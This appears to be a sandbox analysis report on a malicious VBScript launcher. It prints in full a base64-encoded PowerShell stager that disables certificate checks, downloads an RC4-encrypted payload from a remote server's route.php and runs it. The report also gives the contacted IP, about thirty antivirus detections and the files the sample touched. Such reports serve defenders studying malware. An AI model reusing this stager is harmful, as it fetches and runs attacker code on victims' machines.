SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAQQBCAHAAQQBDADQAQQBiAFEAQgBwAEEASABNAEEAYwB3AEIAbABBAEcAUQBBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAYwBBAEIAaABBAEgASQBBAFkAdwBCAGwAQQBHAHcAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAHIAbwB1AHQAZQAuAHAAaABwACcAOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAawBtAFgAUQB4AHoAXwA8AGwANQBaAC4AMwB7AC0AKwA9AD4ATgByACoAfgBWAGQAeQBAADcASQAvAHwAOQB9ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgByAFUARQBCAHUASQA9AFgAZgBNAFkAZwByADMASwBEAFkAdgBBACsAMgA0ADcAcgA3ADUAaABOAEYAOQBEAHAAMQBrAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=
parent_process	wscript.exe				martian_process	powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQByAHYAZQByAEMAZQByAHQAaQBmAGkAYwBhAHQAZQBWAGEAbABpAGQAYQB0AGkAbwBuAEMAYQBsAGwAYgBhAGMAawAgAD0AIAB7ACQAdAByAHUAZQB9ADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcARQBBAGMAQQBCAHAAQQBDADQAQQBiAFEAQgBwAEEASABNAEEAYwB3AEIAbABBAEcAUQBBAFoAdwBCAHMAQQBHADgAQQBZAGcAQgBoAEEARwB3AEEAYwBBAEIAaABBAEgASQBBAFkAdwBCAGwAQQBHAHcAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAPQAnACkAKQApADsAJAB0AD0AJwAvAHIAbwB1AHQAZQAuAHAAaABwACcAOwAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAHcAYwAuAFAAcgBvAHgAeQA9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAHIAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAawBtAFgAUQB4AHoAXwA8AGwANQBaAC4AMwB7AC0AKwA9AD4ATgByACoAfgBWAGQAeQBAADcASQAvAHwAOQB9ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBDAG8AbwBrAGkAZQAiACwAIgByAFUARQBCAHUASQA9AFgAZgBNAFkAZwByADMASwBEAFkAdgBBACsAMgA0ADcAcgA3ADUAaABOAEYAOQBEAHAAMQBrAD0AIgApADsAJABkAGEAdABhAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAcwBlAHIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAdABhAFsAMAAuAC4AMwBdADsAJABkAGEAdABhAD0AJABkAGEAdABhAFsANAAuAC4AJABkAGEAdABhAC4AbABlAG4AZwB0AGgAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA=

Creates a suspicious Powershell process (2 events)

option	-nop				value	Does not load current user profile
option	-nop				value	Does not load current user profile

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

144.126.228.108:443

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

CAT-QuickHeal	Script.Trojan.39876
McAfee	PS/Injector.d
VIPRE	VBS.Heur.Laburrak.14.29C080A2.Gen
Sangfor	Malware.Generic-VBS.Save.f99adb70
Symantec	ISB.Downloader!gen56
ESET-NOD32	PowerShell/TrojanDownloader.Agent.ABM
Avast	VBS:Downloader-AXD [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	VBS.Heur.Laburrak.14.29C080A2.Gen
NANO-Antivirus	Trojan.Script.Downloader.inbiqr
MicroWorld-eScan	VBS.Heur.Laburrak.14.29C080A2.Gen
Emsisoft	VBS.Heur.Laburrak.14.29C080A2.Gen (B)
F-Secure	Malware.VBS/PSRunner.VPSV
McAfee-GW-Edition	PS/Injector.d
FireEye	VBS.Heur.Laburrak.14.29C080A2.Gen
Sophos	ATK/PSDL-D
Ikarus	Trojan.Script
GData	VBS.Heur.Laburrak.14.29C080A2.Gen
Avira	VBS/PSRunner.VPSV
Xcitium	TrojWare.Win32.BadShell.XSN@7pmib7
Arcabit	VBS.Heur.Laburrak.14.29C080A2.Gen
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
Microsoft	Trojan:Script/Woreflint.A!cl
Google	Detected
AhnLab-V3	Powershell/Downloader.S5
ALYac	VBS.Heur.Laburrak.14.29C080A2.Gen
MAX	malware (ai score=85)
Tencent	Heur:Trojan.Powershell.Generic.u
Fortinet	PowerShell/Injector.D!tr
AVG	VBS:Downloader-AXD [Trj]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

launcher.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All